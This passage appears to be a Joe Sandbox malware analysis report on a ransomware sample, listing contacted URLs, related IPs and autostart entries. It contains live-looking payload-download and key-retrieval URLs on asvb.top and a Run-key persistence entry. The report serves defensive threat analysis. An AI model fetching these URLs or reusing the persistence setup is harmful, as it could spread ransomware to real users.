            http://asvb.top/files/penelop/5.exertsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/5.exe$runndless_query_for_$tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/3.exe$tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ocsp.digicertV01tmp.log.7.drfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.in/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
            • Avira URL Cloud: malware
            unknown
            http://asvb.top/files/penelop/updatewin.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.com/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.it/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
            • Avira URL Cloud: malware
            unknown
            https://we.tl/t-TVrnNufMGqtsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000806000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.000000000080B000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.7.dr, _readme.txt2.7.dr, _readme.txt0.7.dr, _readme.txt1.7.drtrue
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/updatewin.exerunrtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/4.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4_7tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.2ip.ua/geo.json7%tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.fr/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
            • Avira URL Cloud: malware
            unknown
            https://api.2ip.ua/qtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.reddit.com/tsnsd8pOvn.exe, 00000007.00000003.3308312169.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://res.cdn.office.neV0100005.log.7.drfalse
            • Avira URL Cloud: safe
            unknown
            http://asvb.top/files/penelop/4.exeruntsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://autodiscover.uk/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
              unknown
              http://asvb.top/files/penelop/5.exeXtsnsd8pOvn.exe, 00000007.00000002.3368804894.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/updatewin2.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/nddddhsspen6/get.php?pid=tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exeYtsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://res.cdn.officXV0100005.log.7.drfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/updatewin2.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://autodiscover.xyz/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
              • Avira URL Cloud: malware
              unknown
              https://autodiscover.com.br/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
              • Avira URL Cloud: malware
              unknown
              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationV0100005.log.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/gtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exe)tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.wct425E.tmp.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json-ztsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonmtsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exe0tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonitsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-TVrnNufMtsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.cowct425E.tmp.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://autodiscover.in/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                unknown
                https://api.2ip.ua/geo.json9tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://asvb.top/files/penelop/5.exe$runwtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://api.2ip.ua/geo.json7tsnsd8pOvn.exe, 0000000B.00000002.2353811966.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.youtube.com/tsnsd8pOvn.exe, 00000007.00000003.3308505844.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://asvb.top/files/penelop/3.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://autodiscover.online/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                • Avira URL Cloud: safe
                unknown
                https://api.2ip.ua/geo.jsonMtsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://aefd.nelreports.net/api/report?cat=bingrmsV01tmp.log.7.drfalse
                  • URL Reputation: safe
                  unknown
                  https://autodiscover.com.cn/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://autodiscover.it/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                    unknown
                    https://api.2ip.ua/geo.jsonHtsnsd8pOvn.exe, 00000002.00000002.2170674140.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/5.exe$runktsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.2ip.ua/geo.jsonGtsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/5.exeruntsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/updatewin1.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/ui.win32.js.map/d6bb35bc608af2672a5b746baprep_ui_win32_bundle_V8_perf.cache.7.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/updatewin2.exerunxtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://autodiscover.com.br/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                      unknown
                      https://api.2ip.ua/geo.jsontem32tsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4O6.mtsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://autodiscover.xyz/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                        unknown
                        http://asvb.top/files/penelop/updatewin.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.amazon.com/tsnsd8pOvn.exe, 00000007.00000003.3307957618.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.twitter.com/tsnsd8pOvn.exe, 00000007.00000003.3308366967.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://dc.services.visualstudio.com/v2/trackwct425E.tmp.7.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/files/penelop/3.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.openssl.org/support/faq.htmltsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://we.tl/t-TVrnNufMutsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errortsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/nddddhsspen6/get.php638Z0tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELV0100005.log.7.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/files/penelop/updatewin1.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://api.2ip.ua/geo.json2%tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.2ip.ua/geo.jsonstsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://autodiscover.online/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                          unknown
                          http://asvb.top/files/penelop/5.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://autodiscover.com.cn/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            unknown
                            https://github.com/react-native-async-storage/async-storage/issuesprep_foundation_win32_bundle_V8_perf.cache.7.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://cacerts.digicerV0100005.log.7.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nytimes.com/tsnsd8pOvn.exe, 00000007.00000003.3308255641.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://autodiscover.sg/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://api.2ip.ua/tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000958000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://asvb.top/files/penelop/updatewin1.exerunltsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aefd.nelreports.net/api/report?cat=wsbV01tmp.log.7.drfalse
                            • URL Reputation: safe
                            unknown
                            https://autodiscover.es/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://asvb.top/nddddhsspen6/gettsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://asvb.top/files/penelop/updatewin2.exe.xtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.2ip.ua/Roottsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://autodiscover.es/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              188.114.97.3
                              api.2ip.uaEuropean Union
                              13335CLOUDFLARENETUSfalse
                              92.246.89.93
                              asvb.topRussian Federation
                              49558LIVECOMM-ASRespublikanskayastr3k6RUtrue
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1499386
                              Start date and time:2024-08-26 23:30:13 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 27s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:tsnsd8pOvn.exe
                              renamed because original name is a hash value
                              Original Sample Name:04e42207db45792cae0f6d3fd83f0680N.exe
                              Detection:MAL
                              Classification:mal100.rans.spre.troj.evad.winEXE@18/733@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 30
                              • Number of non-executed functions: 244
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Report size getting too big, too many NtWriteFile calls found.
                              • VT rate limit hit for: tsnsd8pOvn.exe
                              TimeTypeDescription
                              17:33:00API Interceptor1x Sleep call for process: tsnsd8pOvn.exe modified
                              23:31:09Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe s>--Task
                              23:31:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              23:31:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              188.114.97.3QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • filetransfer.io/data-package/e0pM9Trc/download
                              steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                              http://membership.garenaa.id.vn/css/tunnel.aspx/manager10.jspGet hashmaliciousUnknownBrowse
                              • membership.garenaa.id.vn/user/login/images/fb_ico.png
                              Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                              • lysyvan.com/login.php
                              700987654656676.exeGet hashmaliciousDBatLoader, FormBookBrowse
                              • www.coinwab.com/kqqj/?eJ=7HHhUI7NBywWL5iw6vBoOC1R9nc6cE2Y1UmgCStXrWBBqhu9PJUZU2f6gs8mUMG7LvvYO9vLlwJ8Ne8neaHQQZFpXb2jdQdMFopJRCp5HeIQieixqdhWtgQ=&zPCT=URo4h
                              PI#220824.exeGet hashmaliciousFormBookBrowse
                              • www.bbyul.shop/1i58/
                              Document 21824RXVPO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • www.avantfize.shop/y1j7/
                              PI #9100679047.exeGet hashmaliciousFormBookBrowse
                              • www.bbyul.shop/1i58/?6fQ=evG0&gLc=XqU6jghuSqY8MpCZA7iVsp22hhGmB+aP50JZxBPQHjQb8W504z1krI9n0nehtDU4K/YNHLkqPrKb1IHVqfZj2x+2juMl9gnRGRd/nNq6cBsZ0P16fQsAoUY=
                              Set-up.exeGet hashmaliciousCryptbotBrowse
                              • neincl19vt.top/v1/upload.php
                              Set-up.exeGet hashmaliciousCryptbotBrowse
                              • neincl19vt.top/v1/upload.php
                              92.246.89.93C0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
                              • znpst.top/dl/build2.exe
                              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • fuyt.org/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • fuyt.org/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD
                              LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
                              • afeifieuuufufufuf.su/tldr.php?newinf=1
                              FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • fuyt.org/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E
                              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • fuyt.org/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                              F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • fuyt.org/fhsgtsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
                              E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • fuyt.org/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E
                              D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              asvb.topstop_packed.exeGet hashmaliciousDjvuBrowse
                              • 35.186.238.101
                              3uOVAaXGdV.exeGet hashmaliciousDjvuBrowse
                              • 35.237.46.9
                              MV4WSB1Wje.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              GaUJ2oJBUY.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              y74H7ek2rC.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              MoDLWYDM3Z.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              N7mpyuk0CI.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              aIVU5W8BLb.exeGet hashmaliciousDjvuBrowse
                              • 35.236.78.72
                              api.2ip.ua3QKcKCEzYP.exeGet hashmaliciousLummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBCBrowse
                              • 188.114.96.3
                              file.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 188.114.96.3
                              C0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 188.114.96.3
                              284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
                              • 188.114.96.3
                              file.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 188.114.97.3
                              setup.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 188.114.96.3
                              e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zipGet hashmaliciousDjvuBrowse
                              • 188.114.97.3
                              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • 188.114.96.3
                              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • 188.114.97.3
                              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • 188.114.96.3
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSxnxx.exeGet hashmaliciousUnknownBrowse
                              • 104.20.3.235
                              z15OrderN_24OS1275del26-08-2024_LTBLLC_.exeGet hashmaliciousGuLoaderBrowse
                              • 172.67.207.219
                              6rfHnQpz6K.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 172.64.41.3
                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                              • 104.21.24.156
                              file.exeGet hashmaliciousUnknownBrowse
                              • 172.64.41.3
                              http://jmnx1.riburfuli.comGet hashmaliciousUnknownBrowse
                              • 172.67.206.34
                              Status Update C7PVO.htmlGet hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              LIVECOMM-ASRespublikanskayastr3k6RUC0XWmZAnYk.exeGet hashmaliciousBabuk, DjvuBrowse
                              • 92.246.89.93
                              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                              • 92.246.89.93
                              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
                              • 92.246.89.93
